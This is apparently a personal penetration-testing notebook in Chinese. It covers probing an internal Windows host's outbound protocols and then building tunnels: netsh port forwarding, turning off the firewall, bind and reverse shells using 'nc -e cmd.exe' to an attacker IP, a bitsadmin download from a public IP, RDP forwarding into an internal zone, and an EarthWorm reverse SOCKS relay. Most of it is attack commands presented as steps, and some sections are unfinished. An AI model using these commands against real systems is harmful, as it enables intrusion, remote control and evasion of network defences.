一、探测内网服务器出网协议

windows系统

1，icmp协议出网探测

ping自己的vps的IP地址

 

2，DNS协议出网探测

ping www.baidu.com

nslookup www.baidu.com

3，TCP出网探测

telnet vps ip

2，nc

攻击机：nc -lvvp 4444

受害机：nc vps-ip 4444

3,

bitsadmin /rawreturn /transfer down "http://120.79.66.58/1.gif" d:\1.txt

4,

powershell -exec bypass Import-Module .\telnet.ps1 Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP

二、构建协议隧道

1，netsh端口转发

netsh是windows自带的可以管理windows网络配置和防火墙的工具。可以通过netsh将传入的tcp连接转发到
本地或者远程计算机的端口。

该工具只有在具有管理权限时可以使用。

可以查看存在的转发
netsh interface portproxy show all

添加一个IPV4到IPV4的端口映射
netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port
删除指定转发端口
netsh interface portproxy delete v4tov4 listenport=port

netsh advfirewall show allprofiles 查看当前系统所有网络类型的防火墙状态
netsh advfirewall set allprofiles state off 关闭当前系统防火墙
netsh advfirewall set allprofiles state on 启用当前系统防火墙

建立正向shell：

1，添加防火墙策略，允许外部通过TCP协议访问4444端口

rule name:规则名称（随便起名）

dir 方向  action 动作（允许，禁止） protocol:协议 localport:本地端口

netsh advfirewall firewall add rule name="nc in" dir=in action=allow protocol=TCP localport=4444

2，上传netcat-win32-1.12.zip到目标机，并切换到该目录下，执行nc.exe -lvp 4444 -e cmd.exe

3，在攻击机上执行nc64.exe -nv 192.168.206.129 4444,获取到正向shell

建立反向shell：

攻击机

1，攻击机添加防火墙策略，开放4443端口

netsh firewall add portopening TCP 4443 “nc reverse shell”

2，攻击机监听4443端口 nc64.exe -lvp 4443

目标机

3，目标机添加防火墙策略，允许4443端口放行TCP协议

netsh advfirewall firewall add rule name="nc reverse shell" dir=out action=allow protocol=TCP
localport=4443

4，目标机上使用之前上传的nc工具，连接攻击机的4443端口

nc64.exe -nv 192.168.206.1 4443 -e cmd.exe

5、攻击机上获取到目标机的shell

6、虽然成功建立起了链接，但是没有回显，无法执行命令

7、通过层层排查，原来是因为受害机是64位的，应该使用nc64.exe，而不是nc.exe

8，攻击机获取到了受害机的shell

可以看到受害机使用49169端口与攻击机的4443端口建立起了链接  ESTABLISHED（建立） pid:2560 

CLOSE_WAIT 对方主动关闭连接或网络异常导致连接中断

9.tasklist /svc | findstr "2560" 通过pid发现是nc64.exe建立的连接

10，wmic process 查询详细进程信息

转发军事区服务器端口

边界机

1，边界机添加防火墙策略，允许8888端口连入

netsh advfirewall firewall add rule name="3389 test" dir=in action=allow protocol=TCP localport=8888

2，添加防火墙策略，将攻击机访问边界机8888端口的流量转发到军事区主机的33389端口

netsh interface portproxy add v4tov4 listenport=8888 connectaddress=192.168.52.129 connectport=3389

3，查看转发规则
netsh interface portproxy show all

（删除转发规则 netsh interface portproxy delete v4tov4 listenport=8888）

4，查看边界机是否在监听8888端口

攻击机

攻击机上需要做的操作就很简单，远程桌面登陆边界机的8888端口

成功登陆到了军事区的winserver 2003服务器

192.168.206.129是边界机win7的IP地址

iptables端口转发

暂无

EW

公网IP测试（未完成，每天再试一试）

（我的vps是64位的，我找了找好想没有64位的linux的ew，很尴尬）

1.查看vps开放端口

firewall-cmd --list-port

2，开启6666和66667端口

firewall-cmd --zone=public --add-port=6666/tcp --permanent

firewall-cmd --zone=public --add-port=6667/tcp --permanent

3，重启防火墙

4，查看是否成功开启

5，vps上监听6666和6667端口，攻击者机器访问6666端口，目标机器访问6667端口。

./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &

 反弹 SOCKS v5 服务器

攻击机：win7  

目标机：winserver2003

1，攻击机上监听1080和888端口

2，目标机上

3，攻击机上已建立连接

4，使用SocksCap6进行后续的渗透